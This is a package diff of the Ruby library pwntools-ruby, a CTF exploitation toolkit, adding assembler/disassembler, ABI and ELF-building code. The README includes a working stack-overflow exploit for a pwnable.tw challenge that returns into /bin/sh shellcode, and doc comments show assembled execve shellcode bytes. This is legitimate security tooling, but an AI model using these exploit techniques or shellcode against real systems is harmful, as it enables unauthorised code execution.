pwntools 0.1.0 → 1.2.1

checksums.yaml

@@ -1,7 +1,7 @@
 ---
-SHA1:
-  metadata.gz: 03accad444e614bc79ec41ce5e4340d32058a3e0
-  data.tar.gz: 827fd60a5aded02428f145da00345acaeb9d42b3
+SHA256:
+  metadata.gz: 25176dd168e5b1f2653b2d69198fd1dec741d3314712837697635a290d923e3b
+  data.tar.gz: 407ba3df5888aa6e2450b412294403904050009b35fae8e6decebf4ff8d154dd
 SHA512:
-  metadata.gz: f13058f95608bfd3444f2c99dde3d62b4d35d59a35ae3aed8b12a12fb016129fd8de2ed339feb0f6a9d36f798244e33970e91fbee94923b40da46bbe8150f082
-  data.tar.gz: 11ce79df711489bda139e77f9c02002a9e992c03be35dd06af760a2580a0fc3864462a1c292abf99a09a52a45fff1554f4001a65bc99154307821f6817740e88
+  metadata.gz: 0f118ad7a0a6aadc067b9cd1d11a9d230190440fdc8749127dc8630d8ce630833d5346527ee73960579a71392938d639d89569b85b27eae562dfbbe7fefddab5
+  data.tar.gz: cf5d022ed588bdedcce275f461976d53c4c722119af7315c92241e6588d770ac581c89d63cdda555833d1efbfa43ceb01ea5e763021aeb3c3a452d656327b0d0

data/README.md

@@ -1,10 +1,13 @@
 [![GitHub stars](https://img.shields.io/github/stars/peter50216/pwntools-ruby.svg)](https://github.com/peter50216/pwntools-ruby/stargazers)
-[![Dependency Status](https://img.shields.io/gemnasium/peter50216/pwntools-ruby.svg)](https://gemnasium.com/peter50216/pwntools-ruby)
-[![Build Status](https://img.shields.io/travis/peter50216/pwntools-ruby.svg)](https://travis-ci.org/peter50216/pwntools-ruby)
-[![Test Coverage](https://img.shields.io/codeclimate/coverage/github/peter50216/pwntools-ruby.svg)](https://codeclimate.com/github/peter50216/pwntools-ruby/coverage)
-[![Code Climate](https://img.shields.io/codeclimate/github/peter50216/pwntools-ruby.svg)](https://codeclimate.com/github/peter50216/pwntools-ruby)
+[![GitHub issues](https://img.shields.io/github/issues/peter50216/pwntools-ruby.svg)](https://github.com/peter50216/pwntools-ruby/issues)
+[![Build Status](https://github.com/peter50216/pwntools-ruby/workflows/build/badge.svg)](https://github.com/peter50216/pwntools-ruby/actions)
+[![Test Coverage](https://img.shields.io/codeclimate/coverage/peter50216/pwntools-ruby.svg)](https://codeclimate.com/github/peter50216/pwntools-ruby/coverage)
+[![Code Climate](https://img.shields.io/codeclimate/maintainability/peter50216/pwntools-ruby.svg)](https://codeclimate.com/github/peter50216/pwntools-ruby)
 [![Inline docs](https://inch-ci.org/github/peter50216/pwntools-ruby.svg)](https://inch-ci.org/github/peter50216/pwntools-ruby)
 [![MIT License](https://img.shields.io/badge/license-MIT-blue.svg)](http://choosealicense.com/licenses/mit/)
+[![Dependabot Status](https://api.dependabot.com/badges/status?host=github&repo=peter50216/pwntools-ruby)](https://dependabot.com)
+[![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/)
+<!-- [![Dependency Status](https://img.shields.io/gemnasium/peter50216/pwntools-ruby.svg)](https://gemnasium.com/peter50216/pwntools-ruby) -->
 
 # pwntools-ruby
 
@@ -12,12 +15,12 @@ Always sad when playing CTF that there's nothing equivalent to pwntools in Pytho
 While pwntools is awesome, I always love Ruby far more than Python...
 So this is an attempt to create such library.
 
-There's almost NOTHING here now.
-(Edit: there's something here now, but not much :wink:)
-Going to implement important things (socket, tubes, asm/disasm, pack/unpack utilities) first.
 Would try to have consistent naming with original pwntools, and do things in Ruby style.
 
 # Example Usage
+
+Here's an exploitation for `start` which is a challenge on [pwnable.tw](https://pwnable.tw).
+
 ```ruby
 # encoding: ASCII-8BIT
 # The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code,
@@ -25,20 +28,98 @@ Would try to have consistent naming with original pwntools, and do things in Rub
 
 require 'pwn'
 
-p pack(0x41424344)  # 'DCBA'
-context.endian = 'big'
-p pack(0x41424344)  # 'ABCD'
+context.arch = 'i386'
+context.log_level = :debug
+z = Sock.new 'chall.pwnable.tw', 10000
+
+z.recvuntil "Let's start the CTF:"
+z.send p32(0x8048087).rjust(0x18, 'A')
+stk = u32(z.recvuntil "\xff")
+log.info "stack address: #{stk.hex}" # Log stack address
+
+# Return to shellcode
+addr = stk + 0x14
+payload = addr.p32.rjust(0x18, 'A') + asm(shellcraft.sh)
+z.write payload
+
+# Switch to interactive mode
+z.interact
+```
+
+More features and details can be found in the
+[documentation](http://www.rubydoc.info/github/peter50216/pwntools-ruby/master/frames).
 
-context.local(bits: 16) do
-  p pack(0x4142)  # 'AB'
-end
+# Installation
+
+### Install the latest release:
+```sh
+gem install pwntools
+```
+
+### Install from master branch:
+```sh
+git clone https://github.com/peter50216/pwntools-ruby
+cd pwntools-ruby
+bundle install && bundle exec rake install
 ```
 
+### optional
+
+Some of the features (assembling/disassembling) require non-Ruby dependencies. Checkout the
+installation guide for
+[keystone-engine](https://github.com/keystone-engine/keystone/tree/master/docs) and
+[capstone-engine](http://www.capstone-engine.org/documentation.html).
+
+Or you are able to get running quickly with
+
+```sh
+# Install Capstone
+sudo apt-get install libcapstone3
+
+# Compile and install Keystone from source
+sudo apt-get install cmake
+git clone https://github.com/keystone-engine/keystone.git /tmp/keystone
+cd /tmp/keystone
+mkdir build
+cd build
+../make-share.sh
+sudo make install
+```
+
+# Supported Features
+
+## Architectures
+
+- [x] i386
+- [x] amd64
+- [ ] arm
+- [ ] thumb
+
+## Modules
+
+- [x] context
+- [x] asm
+- [x] disasm
+- [x] shellcraft
+- [x] elf
+- [x] dynelf
+- [x] logger
+- [x] tube
+  - [x] sock
+  - [x] process
+  - [x] serialtube
+- [ ] fmtstr
+- [x] util
+  - [x] pack
+  - [x] cyclic
+  - [x] fiddling
+
 # Development
 ```sh
-git clone git@github.com:peter50216/pwntools-ruby.git
+git clone https://github.com/peter50216/pwntools-ruby
 cd pwntools-ruby
-rake
+bundle
+bundle exec rake
 ```
 
 # Note to irb users

data/Rakefile

@@ -5,10 +5,12 @@ require 'bundler/gem_tasks'
 require 'rainbow'
 require 'rake/testtask'
 require 'rubocop/rake_task'
+require 'yard'
+
+import 'tasks/shellcraft/x86.rake'
 
 RuboCop::RakeTask.new(:rubocop) do |task|
-  task.patterns = ['lib/**/*.rb', 'test/**/*.rb']
-  task.formatters = ['files']
+  task.patterns = ['lib/**/*.rb', 'tasks/**/*.rake', 'test/**/*.rb']
 end
 
 task default: %i(install_git_hooks rubocop test)
@@ -18,9 +20,13 @@ Rake::TestTask.new(:test) do |test|
   test.libs << 'test'
   test.pattern = 'test/**/*_test.rb'
   test.verbose = true
+  test.options = '--pride'
 end
 
+YARD::Rake::YardocTask.new(:doc)
+
 task :install_git_hooks do
+  next if ENV['CI']
   hooks = %w(pre-push)
   git_hook_dir = Pathname.new('.git/hooks/')
   hook_dir = Pathname.new('git-hooks/')

data/lib/pwn.rb

@@ -1,7 +1,8 @@
 # encoding: ASCII-8BIT
+# frozen_string_literal: true
 
-# require this file for easy exploit development, but would pollute main Object
-# and some built-in objects (String, Integer, ...)
+# require this file for easy exploit development, but would pollute main Object and some built-in objects. (String,
+# Integer, ...)
 
 require 'pwnlib/pwn'
 
@@ -12,13 +13,15 @@ require 'pwnlib/ext/array'
 extend Pwn
 
 include Pwnlib
+include Pwnlib::Tubes
+
+# XXX(david942j): include here because module ELF and class ELF have same name..
+include ::Pwnlib::ELF
 
 # Small "fix" for irb context problem.
-# irb defines main.context for IRB::Context, which overrides our
-# Pwnlib::Context :(
-# Since our "context" should be more important for someone requiring 'pwn',
-# and the IRB::Context can still be accessible from irb_context, we should be
-# fine removing context.
+# irb defines main.context for IRB::Context, which overrides our Pwnlib::Context. :(
+# Since our "context" should be more important for someone requiring 'pwn', and the IRB::Context can still be accessible
+# from irb_context, we should be fine removing context.
 class << self
   remove_method(:context) if method_defined?(:context)
 end

data/lib/pwnlib/abi.rb

@@ -0,0 +1,61 @@
+# encoding: ASCII-8BIT
+# frozen_string_literal: true
+
+require 'pwnlib/context'
+
+module Pwnlib
+  # Encapsulates information about a calling convention.
+  module ABI
+    # A super class for recording registers and stack's information.
+    class ABI
+      attr_reader :register_arguments, :arg_alignment, :stack_pointer
+      # Only used for x86, to specify the +eax+, +edx+ pair.
+      attr_reader :cdq_pair
+
+      def initialize(regs, align, stack_pointer, cdq_pair: nil)
+        @register_arguments = regs
+        @arg_alignment = align
+        @stack_pointer = stack_pointer
+        @cdq_pair = cdq_pair
+      end
+
+      class << self
+        def default
+          DEFAULT[arch_key]
+        end
+
+        def syscall
+          SYSCALL[arch_key]
+        end
+
+        private
+
+        def arch_key
+          [context.bits, context.arch, context.os]
+        end
+        include ::Pwnlib::Context
+      end
+    end
+
+    # The syscall ABI treats the syscall number as the zeroth argument,
+    # which must be loaded into the specified register.
+    class SyscallABI < ABI
+      attr_reader :syscall_str
+
+      def initialize(regs, align, stack_pointer, syscall_str)
+        super(regs, align, stack_pointer)
+        @syscall_str = syscall_str
+      end
+    end
+
+    DEFAULT = {
+      [32, 'i386', 'linux'] => ABI.new([], 4, 'esp', cdq_pair: %w(eax edx)),
+      [64, 'amd64', 'linux'] => ABI.new(%w(rdi rsi rdx rcx r8 r9), 8, 'rsp', cdq_pair: %w(rax rdx))
+    }.freeze
+
+    SYSCALL = {
+      [32, 'i386', 'linux'] => SyscallABI.new(%w(eax ebx ecx edx esi edi ebp), 4, 'esp', 'int 0x80'),
+      [64, 'amd64', 'linux'] => SyscallABI.new(%w(rax rdi rsi rdx r10 r8 r9), 8, 'rsp', 'syscall')
+    }.freeze
+  end
+end

data/lib/pwnlib/asm.rb

@@ -0,0 +1,357 @@
+# encoding: ASCII-8BIT
+# frozen_string_literal: true
+
+require 'tempfile'
+
+require 'elftools'
+require 'keystone_engine/keystone_const'
+
+require 'pwnlib/context'
+require 'pwnlib/errors'
+require 'pwnlib/util/ruby'
+
+module Pwnlib
+  # Convert assembly code to machine code and vice versa.
+  # Use two open-source projects +keystone+/+capstone+ to asm/disasm.
+  module Asm
+    module_function
+
+    # Default virtaul memory base address of architectures.
+    #
+    # This address may be different by using different linker.
+    DEFAULT_VMA = {
+      i386: 0x08048000,
+      amd64: 0x400000,
+      arm: 0x8000
+    }.freeze
+
+    # Mapping +context.arch+ to +::ELFTools::Constants::EM::EM_*+.
+    ARCH_EM = {
+      aarch64: 'AARCH64',
+      alpha: 'ALPHA',
+      amd64: 'X86_64',
+      arm: 'ARM',
+      cris: 'CRIS',
+      i386: '386',
+      ia64: 'IA_64',
+      m68k: '68K',
+      mips64: 'MIPS',
+      mips: 'MIPS',
+      powerpc64: 'PPC64',
+      powerpc: 'PPC',
+      s390: 'S390',
+      sparc64: 'SPARCV9',
+      sparc: 'SPARC'
+    }.freeze
+
+    # Disassembles a bytestring into human readable assembly.
+    #
+    # {.disasm} depends on another open-source project - capstone, error will be raised if capstone is not intalled.
+    # @param [String] data
+    #   The bytestring.
+    # @param [Integer] vma
+    #   Virtual memory address.
+    #
+    # @return [String]
+    #   Disassemble result with nice typesetting.
+    #
+    # @raise [Pwnlib::Errors::DependencyError]
+    #   If libcapstone is not installed.
+    # @raise [Pwnlib::Errors::UnsupportedArchError]
+    #   If disassembling of +context.arch+ is not supported.
+    #
+    # @example
+    #   context.arch = 'i386'
+    #   print disasm("\xb8\x5d\x00\x00\x00")
+    #   #   0:   b8 5d 00 00 00  mov eax, 0x5d
+    #
+    #   context.arch = 'amd64'
+    #   print disasm("\xb8\x17\x00\x00\x00")
+    #   #   0:   b8 17 00 00 00 mov     eax, 0x17
+    #   print disasm("jhH\xb8/bin///sPH\x89\xe71\xd21\xf6j;X\x0f\x05", vma: 0x1000)
+    #   #  1000:   6a 68                          push    0x68
+    #   #  1002:   48 b8 2f 62 69 6e 2f 2f 2f 73  movabs  rax, 0x732f2f2f6e69622f
+    #   #  100c:   50                             push    rax
+    #   #  100d:   48 89 e7                       mov     rdi, rsp
+    #   #  1010:   31 d2                          xor     edx, edx
+    #   #  1012:   31 f6                          xor     esi, esi
+    #   #  1014:   6a 3b                          push    0x3b
+    #   #  1016:   58                             pop     rax
+    #   #  1017:   0f 05                          syscall
+    def disasm(data, vma: 0)
+      require_message('crabstone', install_crabstone_guide) # will raise error if require fail.
+      cs = Crabstone::Disassembler.new(cs_arch, cs_mode)
+      insts = cs.disasm(data, vma).map do |ins|
+        [ins.address, ins.bytes, ins.mnemonic.to_s, ins.op_str.to_s]
+      end
+      max_dlen = format('%x', insts.last.first).size + 2
+      max_hlen = insts.map { |ins| ins[1].size }.max * 3
+      max_ilen = insts.map { |ins| ins[2].size }.max
+      insts.reduce('') do |s, ins|
+        hex_code = ins[1].map { |c| format('%02x', c) }.join(' ')
+        inst = if ins[3].empty?
+                 ins[2]
+               else
+                 format("%-#{max_ilen}s %s", ins[2], ins[3])
+               end
+        s + format("%#{max_dlen}x:   %-#{max_hlen}s %s\n", ins[0], hex_code, inst)
+      end
+    end
+
+    # Convert assembly code to machine code.
+    #
+    # @param [String] code
+    #   The assembly code to be converted.
+    # @param [Integer] vma
+    #   Virtual memory address.
+    #
+    # @return [String]
+    #   The result.
+    #
+    # @raise [Pwnlib::Errors::DependencyError]
+    #   If libkeystone is not installed.
+    # @raise [Pwnlib::Errors::UnsupportedArchError]
+    #   If assembling of +context.arch+ is not supported.
+    #
+    # @example
+    #   assembly = shellcraft.amd64.linux.sh
+    #   context.local(arch: 'amd64') { asm(assembly) }
+    #   #=> "jhH\xB8/bin///sPj;XH\x89\xE71\xF6\x99\x0F\x05"
+    #
+    #   context.local(arch: 'i386') { asm(shellcraft.sh) }
+    #   #=> "jhh///sh/binj\vX\x89\xE31\xC9\x99\xCD\x80"
+    #
+    # @diff
+    #   Not support +asm('mov eax, SYS_execve')+.
+    def asm(code, vma: 0)
+      require_message('keystone_engine', install_keystone_guide)
+      KeystoneEngine::Ks.new(ks_arch, ks_mode).asm(code, vma)[0]
+    end
+
+    # Builds an ELF file from executable code.
+    #
+    # @param [String] data
+    #   Assembled code.
+    # @param [Integer?] vma
+    #   The load address for the ELF file.
+    #   If +nil+ is given, default address will be used.
+    #   See {DEFAULT_VMA}.
+    # @param [Boolean] to_file
+    #   Returns ELF content or the path to the ELF file.
+    #   If +true+ is given, the ELF will be saved into a temp file.
+    #
+    # @return [String, Object]
+    #   Without block
+    #   - If +to_file+ is +false+ (default), returns the content of ELF.
+    #   - Otherwise, a file is created and the path is returned.
+    #   With block given, an ELF file will be created and its path will be yielded.
+    #   This method will return what the block returned, and the ELF file will be removed after the block yielded.
+    #
+    # @yieldparam [String] path
+    #   The path to the created ELF file.
+    #
+    # @yieldreturn [Object]
+    #   Whatever you want.
+    #
+    # @raise [::Pwnlib::Errors::UnsupportedArchError]
+    #   Raised when don't know how to create an ELF under architecture +context.arch+.
+    #
+    # @diff
+    #   Unlike pwntools-python uses cross-compiler to compile code into ELF, we create ELFs in pure Ruby
+    #   implementation. Therefore, we have higher flexibility and less binary dependencies.
+    #
+    # @example
+    #   bin = make_elf(asm(shellcraft.sh))
+    #   bin[0, 4]
+    #   #=> "\x7FELF"
+    # @example
+    #   path = make_elf(asm(shellcraft.cat('/proc/self/maps')), to_file: true)
+    #   puts `#{path}`
+    #   # 08048000-08049000 r-xp 00000000 fd:01 27671233                           /tmp/pwn20180129-3411-7klnng.elf
+    #   # f77c7000-f77c9000 r--p 00000000 00:00 0                                  [vvar]
+    #   # f77c9000-f77cb000 r-xp 00000000 00:00 0                                  [vdso]
+    #   # ffda6000-ffdc8000 rwxp 00000000 00:00 0                                  [stack]
+    # @example
+    #   # no need 'to_file' parameter if block is given
+    #   make_elf(asm(shellcraft.cat('/proc/self/maps'))) do |path|
+    #     puts `#{path}`
+    #     # 08048000-08049000 r-xp 00000000 fd:01 27671233                           /tmp/pwn20180129-3411-7klnng.elf
+    #     # f77c7000-f77c9000 r--p 00000000 00:00 0                                  [vvar]
+    #     # f77c9000-f77cb000 r-xp 00000000 00:00 0                                  [vdso]
+    #     # ffda6000-ffdc8000 rwxp 00000000 00:00 0                                  [stack]
+    #   end
+    def make_elf(data, vma: nil, to_file: false)
+      to_file ||= block_given?
+      vma ||= DEFAULT_VMA[context.arch.to_sym]
+      vma &= -0x1000
+      # ELF header
+      # Program headers
+      # <data>
+      headers = create_elf_headers(vma)
+      ehdr = headers[:elf_header]
+      phdr = headers[:program_header]
+      entry = ehdr.num_bytes + phdr.num_bytes
+      ehdr.e_entry = entry + phdr.p_vaddr
+      ehdr.e_phoff = ehdr.num_bytes
+      phdr.p_filesz = phdr.p_memsz = entry + data.size
+      elf = ehdr.to_binary_s + phdr.to_binary_s + data
+      return elf unless to_file
+
+      path = Dir::Tmpname.create(['pwn', '.elf']) do |temp|
+        File.open(temp, 'wb', 0o750) { |f| f.write(elf) }
+      end
+      block_given? ? yield(path).tap { File.unlink(path) } : path
+    end
+
+    ::Pwnlib::Util::Ruby.private_class_method_block do
+      def cs_arch
+        case context.arch
+        when 'aarch64' then Crabstone::ARCH_ARM64
+        when 'amd64', 'i386' then Crabstone::ARCH_X86
+        when 'arm', 'thumb' then Crabstone::ARCH_ARM
+        when 'mips', 'mips64' then Crabstone::ARCH_MIPS
+        when 'powerpc64' then Crabstone::ARCH_PPC
+        when 'sparc', 'sparc64' then Crabstone::ARCH_SPARC
+        else unsupported!("Disasm on architecture #{context.arch.inspect} is not supported yet.")
+        end
+      end
+
+      def cs_mode
+        case context.arch
+        when 'aarch64' then Crabstone::MODE_ARM
+        when 'amd64' then Crabstone::MODE_64
+        when 'arm' then Crabstone::MODE_ARM
+        when 'i386' then Crabstone::MODE_32
+        when 'mips' then Crabstone::MODE_MIPS32
+        when 'mips64' then Crabstone::MODE_MIPS64
+        when 'powerpc64' then Crabstone::MODE_64
+        when 'sparc' then 0 # default mode
+        when 'sparc64' then Crabstone::MODE_V9
+        when 'thumb' then Crabstone::MODE_THUMB
+        end | (context.endian == 'big' ? Crabstone::MODE_BIG_ENDIAN : Crabstone::MODE_LITTLE_ENDIAN)
+      end
+
+      def ks_arch
+        case context.arch
+        when 'aarch64' then KeystoneEngine::KS_ARCH_ARM64
+        when 'amd64', 'i386' then KeystoneEngine::KS_ARCH_X86
+        when 'arm', 'thumb' then KeystoneEngine::KS_ARCH_ARM
+        when 'mips', 'mips64' then KeystoneEngine::KS_ARCH_MIPS
+        when 'powerpc', 'powerpc64' then KeystoneEngine::KS_ARCH_PPC
+        when 'sparc', 'sparc64' then KeystoneEngine::KS_ARCH_SPARC
+        else unsupported!("Asm on architecture #{context.arch.inspect} is not supported yet.")
+        end
+      end
+
+      def ks_mode
+        case context.arch
+        when 'aarch64' then 0 # default mode
+        when 'amd64' then KeystoneEngine::KS_MODE_64
+        when 'arm' then KeystoneEngine::KS_MODE_ARM
+        when 'i386' then KeystoneEngine::KS_MODE_32
+        when 'mips' then KeystoneEngine::KS_MODE_MIPS32
+        when 'mips64' then KeystoneEngine::KS_MODE_MIPS64
+        when 'powerpc' then KeystoneEngine::KS_MODE_PPC32
+        when 'powerpc64' then KeystoneEngine::KS_MODE_PPC64
+        when 'sparc' then KeystoneEngine::KS_MODE_SPARC32
+        when 'sparc64' then KeystoneEngine::KS_MODE_SPARC64
+        when 'thumb' then KeystoneEngine::KS_MODE_THUMB
+        end | (context.endian == 'big' ? KeystoneEngine::KS_MODE_BIG_ENDIAN : KeystoneEngine::KS_MODE_LITTLE_ENDIAN)
+      end
+
+      # FFI is used in keystone and capstone binding gems, this method handles when libraries not installed yet.
+      def require_message(lib, msg)
+        require lib
+      rescue LoadError => e
+        raise ::Pwnlib::Errors::DependencyError, "#{e.message}\n\n#{msg}"
+      end
+
+      def install_crabstone_guide
+        <<-EOS
+#disasm depends on capstone, which is detected not installed yet.
+Checkout the following link for installation guide:
+
+http://www.capstone-engine.org/documentation.html
+
+        EOS
+      end
+
+      def install_keystone_guide
+        <<-EOS
+#asm depends on keystone, which is detected not installed yet.
+Checkout the following link for installation guide:
+
+https://github.com/keystone-engine/keystone/tree/master/docs
+
+        EOS
+      end
+
+      # build headers according to context.arch/bits/endian
+      def create_elf_headers(vma)
+        elf_header = create_elf_header
+        # we only need one LOAD segment
+        program_header = create_program_header(vma)
+        elf_header.e_phentsize = program_header.num_bytes
+        elf_header.e_phnum = 1
+        {
+          elf_header: elf_header,
+          program_header: program_header
+        }
+      end
+
+      def create_elf_header
+        header = ::ELFTools::Structs::ELF_Ehdr.new(endian: endian)
+        # this decide size of entries
+        header.elf_class = context.bits
+        header.e_ident.magic = ::ELFTools::Constants::ELFMAG
+        header.e_ident.ei_class = { 32 => 1, 64 => 2 }[context.bits]
+        header.e_ident.ei_data = { little: 1, big: 2 }[endian]
+        # Not sure what version field means, seems it can be any value.
+        header.e_ident.ei_version = 1
+        header.e_ident.ei_padding = "\x00" * 7
+        header.e_type = ::ELFTools::Constants::ET::ET_EXEC
+        header.e_machine = e_machine
+        # XXX(david942j): is header.e_flags important?
+        header.e_ehsize = header.num_bytes
+        header
+      end
+
+      def create_program_header(vma)
+        header = ::ELFTools::Structs::ELF_Phdr[context.bits].new(endian: endian)
+        header.p_type = ::ELFTools::Constants::PT::PT_LOAD
+        header.p_offset = 0
+        header.p_vaddr = vma
+        header.p_paddr = vma
+        header.p_flags = 4 | 2 | 1 # rwx
+        header.p_align = arch_align
+        header
+      end
+
+      # Not sure how this field is used, remove this if it is not important.
+      # This table is collected by cross-compiling and see the align in LOAD segment.
+      def arch_align
+        case context.arch.to_sym
+        when :i386, :amd64 then 0x1000
+        when :arm then 0x8000
+        end
+      end
+
+      def e_machine
+        const = ARCH_EM[context.arch.to_sym]
+        unsupported!("Unknown machine type of architecture #{context.arch.inspect}.") if const.nil?
+
+        ::ELFTools::Constants::EM.const_get("EM_#{const}")
+      end
+
+      def endian
+        context.endian.to_sym
+      end
+
+      def unsupported!(msg)
+        raise ::Pwnlib::Errors::UnsupportedArchError, msg
+      end
+
+      include ::Pwnlib::Context
+    end
+  end
+end